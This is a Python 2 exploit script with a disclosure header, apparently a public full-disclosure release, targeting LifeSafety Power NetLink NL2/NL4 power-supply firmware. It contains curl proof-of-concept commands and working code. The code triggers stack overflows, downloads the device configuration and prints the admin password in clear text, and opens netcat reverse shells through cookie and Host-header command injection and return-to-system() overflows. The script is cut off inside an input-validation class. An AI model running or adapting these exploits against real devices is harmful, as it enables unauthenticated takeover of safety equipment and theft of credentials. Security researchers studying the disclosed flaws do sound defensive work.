#!/usr/bin/python2.7
#
# [Vendor]
# LifeSafety Power
# https://www.lifesafetypower.com/
#
# [Vendor Firmware]
# https://www.lifesafetypower.com/support/software-firmware-downloads
#
# [Summary]
#
# - Thirteen (13) stack overflow in several CGI binaries
# - One (1) Anonymous download of all config and username/password in clear text (PoC: display Username and Password)
# - Nine (9) Anonymous RCE (PoC: Reverse Shell)
# - One (1) authenticated RCE (PoC: Reverse Shell) [Can be combined with config/username/password download]
# - One (1) write file 'where' and 'filename' - content of file cannot be controlled (PoC: verify if remote is vulnerable)
# - Hardcoded 'csrftoken' 123qwertyuiop890 (FPO_1.cgi, FPO_2.cgi, FPV_1.cgi, FPV_2.cgi)
#
# [Details]
#
#
# Vulnerable: index.cgi
# Exploitable: Possible
#
# Suffers of stack overflow in 'submit1' login function (loginname)
#
# R10 point to 'loginname=' + 29 char
#
# curl -v http://192.168.57.20/index.cgi -d "submit1=&loginname=$(for((i=0;i<91;i++));do echo -en "A";done)$(echo -en "XXXX")"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# Vulnerable: authorization.cgi, BTM_1.cgi, BTM_2.cgi, getxml.cgi, mainconfigure.cgi, setctl.cgi
# Exploitable: Yes (PoC below)
#
# This buffer overflow (stack based) vulnerability exist in earlier version of Firmware as well.
#
# The vulnerability exist in the function which decoding URL encoded characters, and will check thru whole input string and decode,
# usally used quite early and before any validation has been done.
# 2032 bytes input after decoding will owerwrite RET, R0 has address to decoded string, perfect for jumping to system()
#
#.text:0000C794 MOV R0, R6 ; dest
#.text:0000C798 MOV R1, SP ; src
#.text:0000C79C STRB R3, [R2,#-0x7D0]
#.text:0000C7A0 BL strcpy ; <==== STACK OVERFLOW
#.text:0000C7A4 ADD SP, SP, #0x3D4
#.text:0000C7A8 ADD SP, SP, #0x400
#.text:0000C7AC LDMFD SP!, {R4-R8,R10,LR}
#.text:0000C7B0 BX LR
#
# GET
#
# curl -H "Cookie: right=3" "http://192.168.57.20/authorization.cgi?`for((i=0;i<2028;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# curl -H "Cookie: right=3" "http://192.168.57.20/BTM_1.cgi?`for((i=0;i<2028;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# curl -H "Cookie: right=3" "http://192.168.57.20/BTM_2.cgi?`for((i=0;i<2028;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# curl -H "Cookie: right=3" "http://192.168.57.20/getxml.cgi?`for((i=0;i<2028;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# curl -H "Cookie: right=3" "http://192.168.57.20/mainconfigure.cgi?`for((i=0;i<2028;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# curl -H "Cookie: right=3" "http://192.168.57.20/setctl.cgi?`for((i=0;i<2028;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# POST
#
# curl "http://192.168.57.20/index.cgi" -H "Cookie: viewnavi=yes; right=1" -d "`for((i=0;i<2028;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
#
# Vulnerable: index.cgi, maindown.cgi, maintools.cgi, maintools.cgi, navi.cgi, authorization.cgi
# Exploitable: No
#
# This buffer overflow (stack based) vulnerability exist in earlier version of Firmware as well.
#
# 'csrftoken' tag suffers of stack overflow, that will pass on to following file fopen() function.
#
#.text:00010BAC LDMIA R3, {R0-R2} ; "/mnt/2/tmp/"
#.text:00010BB0 ADD R4, SP, #0x98+dest
#.text:00010BB4 STMIA R4, {R0-R2}
#.text:00010BB8 MOV R1, R12 ; src
#.text:00010BBC MOV R0, R4 ; dest
#.text:00010BC0 BL strcat ; <==== STACK OVERFLOW
#.text:00010BC4 MOV R0, R4 ; filename
#.text:00010BC8 LDR R1, =aR ; "r"
#.text:00010BCC BL fopen
#
# curl -H "Cookie: right=3" "http://192.168.57.20/index.cgi?csrftoken=`for((i=0;i<501;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# curl -H "Cookie: right=3" "http://192.168.57.20/maindown.cgi?csrftoken=`for((i=0;i<629;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# curl -H "Cookie: right=3" "http://192.168.57.20/maintools.cgi?csrftoken=`for((i=0;i<573;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# curl -H "Cookie: right=3" "http://192.168.57.20/navi.cgi?csrftoken=`for((i=0;i<429;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=58585858} ---
#
# curl -H "Cookie: right=3" "http://192.168.57.20/authorization.cgi?csrftoken=`for((i=0;i<501;i++));do echo -en "B";done`XXXX"
# --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x58585858} ---
#
# [Verified]
# NL2/NL4 - Firmware Version: 7.15, 8.07l-45 and 8.07l-45M
#
#
# [Timeline]
# 2019.02.13: Contact established with LifeSafety Power
# 2019.02.13: LifeSafety Power responded
# 2019.03.03: LifeSafety Power presented updated Firmware
# 2019.05.15: Full Disclosure
#
#
# Have a nice day
# /bashis
#
import string
import sys
import socket
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import hashlib
import re
import struct
from random import *
import random
class HTTPconnect:
def __init__(self, host, proto, verbose, creds, Raw):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw
def Send(self, uri, query_headers, query_data,ID,encode_query):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID
self.encode_query = encode_query
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
url = '{}://{}{}'.format(self.proto, self.host, self.uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Unverified Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)
if self.query_data:
#request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
if self.query_data and self.encode_query:
request = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)
else:
request = urllib2.Request(url, data=self.query_data, headers=self.query_headers)
if self.ID:
# print self.ID
request.add_header('Cookie', self.ID)
else:
request = urllib2.Request(url, None, headers=self.query_headers)
if self.ID:
# print self.ID
request.add_header('Cookie', self.ID)
response = urllib2.urlopen(request)
if response:
print "[<] {} OK".format(response.code)
if self.Raw:
return response
else:
html = response.read()
return html
class LifeSafetyPower:
def __init__(self, rhost, proto, verbose, creds, Raw):
self.rhost = rhost
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw
#
# Access: Anonymous
#
def Login(self,csrftoken,response,headers,Cookie):
self.csrftoken = csrftoken
self.response = response
self.headers = headers
self.Cookie = Cookie
URI = "/"
self.response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,True)
self.Cookie = self.response.info().get('Set-Cookie')
self.response = self.response.read()
self.response = re.split('[()<>?"\n_&;/ ]',self.response)
for check in range(0,len(self.response)):
if self.response[check] == 'csrftoken' and self.response[check+8] == 'value=':
self.csrftoken = self.response[check+9]
print "[i] csrftoken: {}".format(self.csrftoken)
break
#
# lifesafetypower way to have MD5 random Login and Password
#
hash0 = hashlib.md5(self.credentials.split(":")[0] + ":FlexPower_System_Manager:" + self.credentials.split(":")[1]).hexdigest().lower()
hash1 = hashlib.md5(hash0 + self.csrftoken).hexdigest().lower()
#
# Login
#
print "[>] Logging in"
query_args = {
"loginname":self.credentials.split(":")[0],
"ha1":hash1,
"password":"",
"chkRememberPwd":"on",
"submit1":"Login",
"csrftoken":self.csrftoken}
try:
URI = '/index.cgi'
self.response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,self.Cookie,True)
self.Cookie = self.response.info().get('Set-Cookie')
self.response = self.response.read()
self.response = re.split('[()<>?"\n_&;/= ]',self.response)
for check in range(0,len(self.response)):
if self.response[check] == 'csrftoken':
self.csrftoken = self.response[check+1]
print "[i] csrftoken: {}".format(self.csrftoken)
if not self.csrftoken:
print "[!] Login failed (missing csrftoken)"
sys.exit(1)
break
except Exception as e:
print "[!] Login failed ({})".format(e)
return self.Cookie, self.csrftoken
#
# Access: Authenticated
#
def Add_RCE_msmtp(self,csrftoken,response,headers,Cookie,RCE):
self.csrftoken = csrftoken
self.response = response
self.headers = headers
self.Cookie = Cookie
self.RCE = RCE
print "[>] Adding 'msmtp' RCE"
#
# RCE: Configure -> Sender SMTP Server
#
query_args = {
"ss28":"rce@lifesafetypower.com",
"ss29":self.RCE,
"submit70":"",
"csrftoken":self.csrftoken
}
try:
URI = '/mainconfigure.cgi'
self.response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,self.Cookie,True)
#
# Normally we get next valid 'csrftoken' now, but due to RCE and timeout we will never see next valid 'csrftoken'
#
print "[!] RCE Failed!!"
except Exception as e:
print "[*] RCE Successfull ({})".format(e)
return self.Cookie, self.csrftoken
#
# Access: Authenticated
#
def Del_RCE_msmtp(self,csrftoken,response,headers,Cookie):
self.csrftoken = csrftoken
self.response = response
self.headers = headers
self.Cookie = Cookie
print "[>] Delete 'msmtp RCE"
query_args = {
"ss28":"NULL",
"ss29":"",
"submit7":"",
"csrftoken":self.csrftoken
}
try:
URI = '/mainconfigure.cgi'
self.response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,self.Cookie,True)
self.response = self.response.read()
self.response = re.split('[()<>?"\n_&;/= ]',self.response)
for check in range(0,len(self.response)):
if self.response[check] == 'csrftoken':
self.csrftoken = self.response[check+1]
print "[i] csrftoken: {}".format(self.csrftoken)
break
print "[*] Delete RCE Successfull"
except Exception as e:
print "[!] Delete RCE Failed!! ({})".format(e)
return self.Cookie, self.csrftoken
#
# Access: Anonymous
#
# Combining two different stack overflow in two different CGI
#
# Abusing 'X-Sendfile: /tmp/%s' with stack overflow
#
# This code will try copy and download /tmp/allcfg.bin
#
# Actually, if the strstr() in the .cgi will find 'allcfg.bin', it will not continue - so we need to do a small trick here.
# 1. Send '%2561llcfg.bin' that will pass over to the .cgi, the .cgi will decode to '%61llcfg.bin', and when it send back this string to Apache,
# Apache will decode '%61' to 'a' and we have the real name 'allcfg.bin' to be sent.
# 2. Exacly after the string 'allcfg.bin', the .cgi will place one NULL character
# 3. The filler needs to be '/' (can also be './'), since we cannot get out from '/tmp'
# 4. In the end, 'mod_xsendfile.so' catch this and will happily send the 'allcfg.bin' with all config and username/password/hashes
#
# The 'allcfg.bin' has the password both in clear text and in MD5 hash format
#
def Get_allcfg(self,headers):
self.headers = headers
#
# Let make sure that '/tmp/allcfg.bin' will be there by using stack overflow to jump for this code
#
#.text:0000BCC4 LDR R0, =aCpRMnt1CfgAllc ; "cp -r /mnt/1/cfg/allcfg /tmp/allcfg.bi"...
#.text:0000BCC8 BL system
#.text:0000BCCC LDR R0, =aChmod777TmpAll ; "chmod 777 /tmp/allcfg.bin"
#.text:0000BCD0 BL system
URI = '/mainconfigure.cgi?'
URI += self.random_string(2028)
URI += '%c4%bc%00%00'
print "[>] Trying to copy 'allcfg.bin'"
try:
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,False)
print "[!] Copy of 'allcfg.bin' failed!! ({})".format(response.code)
except Exception as e:
if e.code == '500':
print "[!] Copy of 'allcfg.bin' OK!! ({})".format(e)
print "[>] Trying to get 'allcfg.bin'"
URI = '/authorization.cgi?csrftoken=' + "/" * 316
URI += '%2561llcfg.bin'
# URI += "Q" * 173
URI += self.random_string(173)
#
# We jumping to '0x000095b8', R0 will point somewhere into the '//' filler at the stack.
#
#.text:000095B8 ADD R0, SP, #0xA18+var_188
#.text:000095BC ADD R0, R0, #0xC ; haystack
#.text:000095C0 LDR R1, =aAllcfgBin ; "allcfg.bin"
#.text:000095C4 BL strstr
URI += struct.pack('<L',0x95b8)[:2]
try:
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,True)
except Exception as e:
print "[!] Get Config Failed!! ({})".format(e)
return False
response = response.readlines()
for line in response:
line = line.split(' ')[0:25]
if line[0] == 'WS_USR':
for check in range(0,len(line)):
#
# Extract login/password in clear text
#
if line[check] == ':' and line[check+1] == 'admin':
Username = line[check+1]
Password = line[check+2]
line = re.split('[$*#!*\n:, ]',str(line))
#
# Extract the MD5 hash format
#
for check in range(0,len(line)):
if line[check] == 'FlexPower_System_Manager' and line[check-1] == 'admin':
hash0_downloaded = line[check+1]
print "[i] Remote Username: {}, Password: {}".format(Username,Password)
#
# First MD5 hash are made up like this, do small check to see if its matching.
# Random hash that are used for login to the device you can find in the function 'Login' above
#
hash0_calculated = hashlib.md5(Username + ':FlexPower_System_Manager:' + Password).hexdigest().lower()
if self.verbose:
print "[Verbose] Calculated hash: {}".format(hash0_calculated)
print "[Verbose] Downloaded hash: {}".format(hash0_downloaded)
if hash0_calculated == hash0_downloaded:
if self.verbose:
print "[Verbose] hashes matching"
credentials = Username + ':' + Password
return credentials
else:
if self.verbose:
print "[Verbose] hashes not matching"
return False
#
# Access: Anonymous
#
# RCE since 'hash_key' are used unsanitized with system()
# 'hash_key' has limited size, we need to place the longer RCE in another variable 'Pwn' and execute with standard shell trick
#
# Simple curl version:
# curl -v 'http://192.168.57.20/index.cgi' -H 'Pwn: nc 192.168.57.1 4444 -e/bin/sh' -H 'Cookie: right=3; hash_key=$($HTTP_PWN)'
#
# system() R0 string will end up with 'rm -f /tmp//sess_$($HTTP_PWN)'
#
#.text:0000B034 LDR R1, =aRmFTmpSSessS ; "rm -f /tmp/%s/sess_%s"
#.text:0000B038 LDR R2, =unk_29344
#.text:0000B03C MOV R3, R6
#.text:0000B040 MOV R0, R5 ; s
#.text:0000B044 BL sprintf
#.text:0000B048 MOV R0, R5 ; command
#.text:0000B04C BL system
def v8_hash_rce(self,headers, lhost, lport):
self.headers = headers
self.lhost = lhost
self.lport = lport
print "[>] Trying to execute 'hash_key' RCE"
RCE = "nc LHOST LPORT -e /bin/sh"
RCE = RCE.replace("LHOST",self.lhost).replace("LPORT",self.lport)
headers = {
'Pwn': RCE,
'Cookie':'right=3; hash_key=$($HTTP_PWN)',
'User-Agent':'Chrome/5.0'
}
URI = '/index.cgi'
try:
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,True)
print "[*] RCE Failed!"
except Exception as e:
print "[*] RCE Successfull ({})".format(e)
return True
return
#
# Access: Anonymous
#
# Execute RCE via stack overflow
# R12 point to 'Host:'
#
#.text:000097A0 MOV R5, R12
#.text:000097A4 LDMIA R5!, {R0-R3} ; "rm -rf /tmp/sess_"
#.text:000097A8 MOV R4, SP
#.text:000097AC STMIA R4!, {R0-R3}
#.text:000097B0 LDRH R5, [R5] ; "_"
#.text:000097B4 MOV R1, R7 ; src
#.text:000097B8 MOV R0, SP ; dest
#.text:000097BC STRH R5, [R4]
#.text:000097C0 BL strcat
#.text:000097C4 MOV R0, SP ; command
#.text:000097C8 BL system
#
# R0 loads with address: 0x7EFFF4A8
#
# Stackdump
#7EFFF4A0 41 41 41 0A A0 97 00 00 24 28 6E 63 20 31 39 32 AAA.....$(nc 192
#7EFFF4B0 2E 31 36 38 2E 35 37 2E 31 20 02 24 28 6E 63 20 .168.57.1 .$(nc
#7EFFF4C0 31 39 32 2E 31 36 38 2E 35 37 2E 31 20 34 34 34 192.168.57.1 444
#7EFFF4D0 34 20 2D 65 20 2F 62 69 6E 2F 73 68 26 29 29 00 4 -e /bin/sh&)).
#7EFFF4E0 98 F4 FF 7E 41 41 41 41 41 41 41 41 41 41 41 41 .....AAAAAAAAAAA
def v715_rce(self,headers, lhost, lport):
self.headers = headers
self.lhost = lhost
self.lport = lport
print "[>] Trying to execute v7.15 RCE"
RCE = "$(nc LHOST LPORT -e /bin/sh&))" # Correct, two '))', as the system() will try to execute '$(nc LHOST $(nc LHOST LPORT -e /bin/sh&))'
RCE = RCE.replace("LHOST",self.lhost).replace("LPORT",self.lport)
headers = {
'Content-Type' : 'application/x-www-form-urlencoded',
'Connection':' close',
'Host': RCE,
'User-Agent':'Chrome/5.0'
}
URI = '/index.cgi'
RCE = self.random_string(2039)
RCE += struct.pack('<L',0x97a0)[:2]
print Payload
try:
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,RCE,None,False)
# print response.read()
# print response.info()
except Exception as e:
if e.code == 500:
Content_Length = e.info().get('Content-Length')
if Content_Length == '166': # 233 if both 'nc' will fail
print "[i] v7.15 RCE OK"
else:
print "[!] v7.15 RCE Failed!!"
else:
print "[!] v7.15 RCE Failed!! ({})".format(e)
return
#
# Access: Anonymous
#
# Verify if remote target is Netlink or not
#
def Verify_Target(self,headers, lhost, lport):
self.headers = headers
self.lhost = lhost
self.lport = lport
print "[>] Trying to verify remote target"
creds = 'NULL:NULL'
try:
URI = '/psia/'
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,True)
Authenticate = response.info().get('WWW-Authenticate')
if Authenticate:
Authenticate = Authenticate.split('"')
for check in range(0,len(Authenticate)):
if Authenticate[check] == 'FlexPower_System_Manager':
Netlink = True
else:
print "[!] Remote seems not to be Netlink!!"
sys.exit(1)
else:
print "[!] Remote seems not to be Netlink!!"
sys.exit(1)
except Exception as e:
if e.code == 401:
Server = e.info().get('Server')
Authenticate = e.info().get('WWW-Authenticate').split('"')
for check in range(0,len(Authenticate)):
if Authenticate[check] == 'FlexPower_System_Manager':
Netlink = True
else:
print "[!] Remote seems not to be Netlink!! ({})".format(e)
sys.exit(1)
if Netlink and Server:
print "[i] Remote using Apache Web Server"
return True # Version 8.x (Apache Web Server)
elif Netlink and not Server:
print "[i] Remote using Mongoose Web Server"
return False # Version 7.x (Mongoose Web Server)
else:
print "[!] Remote seems not to be Netlink!! ({})".format(e)
sys.exit(1)
#
# Access: Anonymous
#
# Check remote firmware version
#
def Get_Version(self,headers, lhost, lport):
self.headers = headers
self.lhost = lhost
self.lport = lport
print "[>] Trying to get remote firmware version"
headers = {
'Referer':' navi.cgi?csrftoken=',
'Cookie':' right=3; hash_key=kwitfbcuvnnxdjyp; viewnavi=yes',
'User-Agent':'Chrome/5.0'
}
try:
URI = '/navi.cgi'
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,True)
response = re.split('[()<>?"\n_&;/= ]',response.read())
for check in range(0,len(response)):
if response[check] == 'Ver:':
Version = response[check+1]
print "[i] Remote is: Netlink NL2/NL4 Version: {}".format(Version)
except Exception as e:
print "[!] Wrong!! ({})".format(e)
return
#
# Access: Anonymous
#
# We can control where in filesystem to write and filename, but not the content of the file.
# Ok to check if remote target is vulnerable or not.
#
# The tag 'loginname' suffers from stack overflow, so we need to put a NULL character at the end to avoid random chars from stack tailing the filename
#
def Check_Vulnerable(self,headers, lhost, lport, server):
self.headers = headers
self.lhost = lhost
self.lport = lport
self.server = server
print "[>] Checking if remote target is vulnerable"
headers = {
'User-Agent':'Chrome/5.0'
}
VULNERABLE_FILE = '/CHECK'
# We need to put one NULL at end! (Don't work with more %00... :/ )
if self.server:
Payload = "submit1=&password=&loginname=../../../2/apache/htdocs" + VULNERABLE_FILE + '%00'
else:
Payload = "submit1=&password=&loginname=../../../2/web/" + VULNERABLE_FILE + '%00'
try:
print "[>] Trying to create our file"
URI = '/index.cgi'
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,Payload,None,False)
if response.code == 200:
print "[>] Checking if we could create remote file"
URI = VULNERABLE_FILE
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,Payload,None,False)
if response.code == 200:
return True
except Exception as e:
# might give some false positive..
if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
print "[!] Timeout! Should not happen, assume remote is vulnerable..."
return True
else:
return False
#
#
# Simple function to split up a hex address (0xbaadbeef), split this up, URL 'encode' and reverese to Little Endian.
#
#
def URL_Encode_LE(self, hex):
self.hex = hex
self.hex = self.hex[2:]
self.hex = self.hex .zfill(len(self.hex ) + len(self.hex ) % 2)
self.hex = ' '.join(self.hex [i: i+2] for i in range(0, len(self.hex ), 2))
self.hex = self.hex .split()
SH0 = '%{:02x}'.format((int(self.hex [0],16)))
SH1 = '%{:02x}'.format((int(self.hex [1],16)))
SH2 = '%{:02x}'.format((int(self.hex [2],16)))
SH3 = '%{:02x}'.format((int(self.hex [3],16)))
URL_LE = ''.join('{}{}{}{}'.format(SH3,SH2,SH1,SH0))
return URL_LE
#
# Small function to return N in random chars
#
def random_string(self,length):
self.length = length
# return 'A' * self.length
return ''.join(random.choice(string.lowercase) for i in range(self.length))
#
# Access: Anonymous
#
# This buffer overflow (stack based) vulnerability exist in earlier version of Firmware as well.
# However, PoC are made only for latest version!
#
# The vulnerability exist in the function which decoding URL encoded characters, and will check thru whole input string and decode,
# usally used quite early and before any validation has been done.
# 2032 bytes input after decoding will owerwrite RET, R0 has address to decoded string, perfect for jumping to system()
#
# Most binaries are vulnerable with simple GET call, but few are vulnerable with POST.
#
# Very simple and reliable exploitation.
#
# Since there is sh1tload of system() pooped around in the binaries, I thought it would be fun to include all vulnerable binaries into
# a random selection of CGI binary and random selection of system() (You're welcome)
#
#
# Simple curl examples
#
# GET
# curl "http://192.168.57.20/BTM_1.cgi?$(echo -en "nc%20192.168.57.1%204444%20-e/bin/sh")%00%23`for((i=0;i<1996;i++));do echo -en "B";done`%8c%31%01%00" -H "Cookie: viewnavi=yes; right=1"
#
# POST
# curl "http://192.168.57.20/index.cgi" -H "Cookie: viewnavi=yes; right=1" -d "$(echo -en "nc%20192.168.57.1%204444%20-e/bin/sh")%00`for((i=0;i<1997;i++));do echo -en "B";done`%c0%93%00%00"
def URI_Decoder_RCE(self,headers, lhost, lport):
self.headers = headers
self.lhost = lhost
self.lport = lport
headers = {
'User-Agent':'Chrome/5.0',
'Cookie':'viewnavi=yes; right=1' # Needed
}
#
# All vulnerable CGI binaries, and their addresses to system()
#
target_db = {
#
# GET
#
'BTM_1.cgi': [
'0x00009424', # system()
'0x0000942C', # system()
'0x00009434', # system()
'0x00009460', # system()
'0x00009468', # system()
'0x00009470', # system()
'0x00009480', # system()
'0x0000948C', # system()
'0x00012128', # system()
'0x00012384', # system()
'0x0001292C', # system()
'0x00012BE4', # system()
'0x00012C88', # system()
'0x00012D14', # system()
'0x00012D9C', # system()
'0x00012E20', # system()
'0x00012EB8', # system()
'0x00012F50', # system()
'0x00012FE8', # system()
'0x0001318C', # system()
'0x000132A8', # system()
'0x000137A0' # system()
# '0x000115A0' # popen()
],
'BTM_2.cgi': [
'0x00009424', # system()
'0x0000942C', # system()
'0x00009434', # system()
'0x00009460', # system()
'0x00009468', # system()
'0x00009470', # system()
'0x00009480', # system()
'0x0000948C', # system()
'0x00012084', # system()
'0x000122E0', # system()
'0x00012888', # system()
'0x00012B40', # system()
'0x00012BE4', # system()
'0x00012C70', # system()
'0x00012CF8', # system()
'0x00012D7C', # system()
'0x00012E14', # system()
'0x00012EAC', # system()
'0x00012F44', # system()
'0x000130E8', # system()
'0x00013204', # system()
'0x000136FC' # system()
# '0x000114FC' # popen()
],
'getxml.cgi': [
'0x00015AE8', # system()
'0x00015D44', # system()
'0x000162EC', # system()
'0x000165A4', # system()
'0x00016648', # system()
'0x000166D4', # system()
'0x0001675C', # system()
'0x000167E0', # system()
'0x00016878', # system()
'0x00016910', # system()
'0x000169A8', # system()
'0x00016B4C', # system()
'0x00016C68', # system()
'0x00017160' # system()
# '0x00014F60' # popen()
],
'authorization.cgi': [
'0x0000EE04', # system()
'0x0000F060', # system()
'0x0000F608', # system()
'0x0000F8C0', # system()
'0x0000F964', # system()
'0x0000F9F0', # system()
'0x0000FA78', # system()
'0x0000FAFC', # system()
'0x0000FB94', # system()
'0x0000FC2C', # system()
'0x0000FCC4', # system()
'0x0000FE68', # system()
'0x0000FF84', # system()
'0x0001047C' # system()
# '0x0000E27C' # popen()
],
'mainconfigure.cgi': [
'0x0000A568', # system()
'0x0000A5F4', # system()
'0x0000A694', # system()
'0x0000A704', # system()
'0x0000A798', # system()
'0x0000A804', # system()
'0x0000A86C', # system()
'0x0000BCC8', # system()
'0x0000BCD0', # system()
'0x0000DD4C', # system()
'0x0000DD78', # system()
'0x0000E078', # system()
'0x0000E34C', # system()
'0x0000E568', # system()
'0x0000E73C', # system()
'0x0000E8E8', # system()
'0x0000EA80', # system()
'0x0000ED00', # system()
'0x0000ED70', # system()
'0x0000F5C4', # system()
'0x0000F794', # system()
'0x0000F978', # system()
'0x0000F9B8', # system()
'0x0001237C', # system()
'0x00012384', # system()
'0x000124DC', # system()
'0x0001BA70', # system()
'0x0001BB24', # system()
'0x0001C6B8', # system()
'0x0001C6F0', # system()
'0x0001C718', # system()
'0x0001EA44', # system()
'0x0001F468', # system()
'0x0001F470', # system()
'0x0001F938', # system()
'0x0001F944', # system()
'0x0001F950', # system()
'0x0001F95C', # system()
'0x0001F968', # system()
'0x0001F974', # system()
'0x0001F980', # system()
'0x0001F98C', # system()
'0x0001F998', # system()
'0x0001F9A4', # system()
'0x0001F9B0', # system()
'0x0001F9BC', # system()
'0x0001F9C8', # system()
'0x0001F9D4', # system()
'0x0001F9E0', # system()
'0x0001F9EC', # system()
'0x0001F9F8', # system()
'0x0001FA04', # system()
'0x0001FA10', # system()
'0x0001FA1C', # system()
'0x0001FA28', # system()
'0x0001FA34', # system()
'0x0001FA40', # system()
'0x0001FA4C', # system()
'0x0001FA58', # system()
'0x0001FA64', # system()
'0x0001FA70', # system()
'0x00025680', # system()
'0x000258DC', # system()
'0x00025E84', # system()
'0x0002613C', # system()
'0x000261E0', # system()
'0x0002626C', # system()
'0x000262F4', # system()
'0x00026378', # system()
'0x00026410', # system()
'0x000264A8', # system()
'0x00026540', # system()
'0x000266E4', # system()
'0x00026800', # system()
'0x00026CF8' # system()
# '0x0001B9CC' # popen()
# '0x00024AF8' # popen()
],
'setctl.cgi': [
'0x00009108', # system()
'0x00009160', # system()
'0x000091C8', # system()
'0x00009230', # system()
'0x0000947C' # system()
# '0x0000F0FC' # popen()
],
#
# POST
#
'index.cgi': [
'0x000093C0', # system()
'0x00009C6C', # system()
'0x00009ED4', # system()
'0x00009EDC', # system()
'0x00009EE4', # system()
'0x0000A028', # system()
'0x0000A534', # system()
'0x0000A608', # system()
'0x0000A78C', # system()
'0x0000A7B8', # system()
'0x0000A9A0', # system()
'0x0000B04C', # system()
'0x00011E00', # system()
'0x0001205C', # system()
'0x00012604', # system()
'0x000128BC', # system()
'0x00012960', # system()
'0x000129EC', # system()
'0x00012A74', # system()
'0x00012AF8', # system()
'0x00012B90', # system()
'0x00012C28', # system()
'0x00012CC0', # system()
'0x00012E64', # system()
'0x00012F80', # system()
'0x00013478' # system()
# '0x00011278', # popen()
]
}
#
# random stuff to select CGI target and random system() call
#
CGI_random = randint(0, len(target_db)-1)
CGI = target_db.keys()[CGI_random]
SYSTEM_random = randint(0, len(target_db[CGI])-1)
URL_SYSTEM = self.URL_Encode_LE(target_db[CGI][SYSTEM_random])
print "[i] Random CGI: {}, system(): {} Encoded: {}".format(CGI,target_db[CGI][SYSTEM_random],URL_SYSTEM)
try:
URI = '/'
URI += CGI
if not CGI == 'index.cgi':
URI += '?'
RCE = 'nc%20LHOST%20LPORT%20-e/bin/sh&%00' # fork() + NULL char #32
RCE = RCE.replace("LHOST",self.lhost).replace("LPORT",self.lport)
RCE += self.random_string(2028 - (len(RCE) -8)) # -8 for the URL encoded chars
RCE += URL_SYSTEM
if CGI == 'index.cgi':
# POST
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,RCE,None,False)
else:
# GET
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI + RCE,headers,None,None,False)
print response
except Exception as e:
# print e.info(), e.info().get('Content-Length')
if e.code == 500 and e.info().get('Content-Length') == '542':
print "[*] Should be OK"
return
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
